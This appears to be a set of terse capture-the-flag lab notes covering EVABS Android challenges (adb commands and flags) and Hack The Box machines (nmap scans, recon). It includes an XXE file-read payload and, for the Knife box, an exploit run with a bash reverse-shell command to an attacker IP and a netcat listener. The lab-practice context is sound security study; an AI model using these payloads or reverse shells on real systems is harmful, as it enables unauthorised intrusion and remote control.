EVABS Challenge 6

$ adb shell
vbox86p:/data/data/com.revo.evabs/databases # ls
$ adb pull /data/data/com.revo.evabs/databases/MAINFRAME_ACCESS .
$ ls
$ file MAINFRAME_ACCESS
EVABS{sqlite_is_not_safe}

EVABS Challenge 5

$ adb shell
vbox86p:/data/data/com.revo.evabs # ls
vbox86p:/data/data/com.revo.evabs # cd shared_prefs
vbox86p:/data/data/com.revo.evabs/shared_prefs # ls
vbox86p:/data/data/com.revo.evabs/shared_prefs # cat DETAILS.xml
EVABS{shar3d_pr3fs_c0uld_be_c0mpromiz3ds}

EVABS Challenge 4

EVABS{th!s_plac3_is_n0t_as_s3cur3_as_it_l00ks}

HTB BountyHunter

$ nmap -A 10.10.11.100 -T4 -v
Open ports
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

http://10.10.11.100/
http://10.10.11.100/resources/README.txt
http://10.10.11.100/portal.php
http://10.10.11.100/log_submit.php

As we can observe in Burp, the data is URL- and base64-encoded. It's XML data, so we could try an XXE. Using CyberChef (https://gchq.github.io) on https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe we also find:
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file_to_use"> ]>
We can use it to check other files

EVABS Challenge 3

HTB Love

$ nmap -A -p- 10.10.10.239 -T4
Open ports:
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd

EVABS Challenge 2

EABS{fil3s_!n_ass3ts_ar3_eas!ly_hackabl3}

HTB Knife

$ nmap 10.10.10.242
$ nmap 10.10.10.242 -p- -v
http://10.10.10.242/
$ whatweb 10.10.10.242
$ searchsploit php 8.1.0-dev
$ searchsploit -m php/webapps/49933.py
$ python3 49933.py
$ id

Using this exploit we get a reverse shell, but it is not very useful; we can try to get a better one.
https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html

$ python3 php_8.1.0-dev_exploit.py -u http://10.10.10.242/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1'"
$ sudo nc -lvnp 4444
james@knife:/$ ls
james@knife:/$ cd /home
james@knife:/home$ ls
james@knife:/home$

EVABS (Extremely Vulnerable Android Labs) Challenge 1

According to https://github.com/abhi-r3v0/EVABS: An open source Android application that is intentionally vulnerable so as to act as a learning platform for Android application security beginners. The effort is to introduce beginners with very limited or zero knowledge to some of the major and commonly found real-world based Android application vulnerabilities in a story-based, interactive model. EVABS follows a level-wise difficulty approach and in each level, the player learns a new

HTB Cap

$ nmap -A -p- 10.10.10.245 -T4 -Pn
Open ports:
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn

http://10.10.10.245/
Dashboard Security Snapshot IP Config Network status Security Snapshot
http://10.10.10.245/data/1

Using Burp we can discover the content of the site and discover if there is anything else in content data. Using Burp Discover functionality we can obtain also if